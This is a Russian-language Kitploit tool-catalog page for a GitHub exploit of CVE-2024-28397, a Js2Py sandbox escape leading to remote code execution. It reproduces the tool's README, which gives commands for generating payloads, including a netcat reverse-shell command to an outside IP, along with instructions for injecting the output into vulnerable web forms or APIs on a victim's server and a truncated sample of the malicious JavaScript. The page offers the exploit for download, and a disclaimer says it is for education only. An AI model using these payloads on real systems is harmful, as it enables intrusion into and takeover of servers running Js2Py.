Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/xeloxa/cve-2024-28397-js2py-rce-exploit
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubxeloxa/cve-2024-28397-js2py-rce-exploit

CVE-2024-28397-Js2Py-RCE-Exploit

Профессиональный эксплойт для CVE-2024-28397: Js2Py Sandbox Escape, приводящий к удаленному выполнению кода (RCE). Включает модульную генерацию полезных нагрузок.

РепозиторийСайт
2127 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Превью технического брифинга

💡 Глубокое погружение: Нажмите здесь, чтобы прочитать полный технический брифинг (PDF).

CVE-2024-28397: Генератор полезной нагрузки для обхода песочницы Js2Py

Python License CVE

Профессиональный генератор полезной нагрузки для CVE-2024-28397. Этот инструмент генерирует вредоносный JavaScript-код, предназначенный для обхода песочницы js2py (версии <= 0.74) и выполнения произвольных команд на целевой системе.

🚨 Детали уязвимости

  • Идентификатор CVE: CVE-2024-28397
  • Затронутый компонент: <= 0.74
Js2Py
  • Воздействие: Удаленное выполнение кода (RCE) / Обход песочницы
  • Механизм: Эксплуатирует Object.getOwnPropertyNames для доступа к классу subprocess.Popen Python из среды JavaScript.
  • 🚀 Использование

    Этот скрипт генерирует точную полезную нагрузку JavaScript, необходимую для эксплуатации уязвимости. Для использования этого инструмента не требуется устанавливать js2py.

    1. Сгенерировать полезную нагрузку

    Запустите скрипт с командой, которую хотите выполнить на машине жертвы.

    root@kitploit:~
    # Generate payload to run 'id'
    python3 exploit.py -c "id"
    
    root@kitploit:~
    # Generate payload for a Reverse Shell
    python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"
    

    2. Атаковать цель

    Скопируйте вывод, сгенерированный инструментом, и внедрите его в уязвимое приложение (например, веб-форму, конечную точку API или файл конфигурации, который обрабатывается js2py).

    Пример внедрения: Если веб-сайт принимает пользовательский ввод и выполняет его с помощью js2py.eval_js(user_input), вставка сгенерированного кода выполнит вашу команду на их сервере.

    📝 Пример

    root@kitploit:~
    $ python3 exploit.py -c "whoami"
    
        var output = "Initial";
        try {
            var leaked_wrapper = Object.getOwnPropertyNames({});
            // ... (full malicious code) ...
            var res = Popen("whoami", ...).communicate();
            output = res;
        } ...
        output
    

    👨‍💻 Автор

    Ali Sünbül (xeloxa)

    • 📧 Электронная почта: [email protected]
    • 🌐 Веб-сайт: xeloxa.netlify.app
    • 🐙 GitHub: @xeloxa

    ⚠️ Отказ от ответственности

    Данное программное обеспечение предоставляется только для образовательных целей и исследований в области безопасности. Автор не несет ответственности за любое неправомерное использование этого кода. Убедитесь, что у вас есть явное разрешение, прежде чем тестировать это на любой системе, которую вы не контролируете.

    Скачать инструмент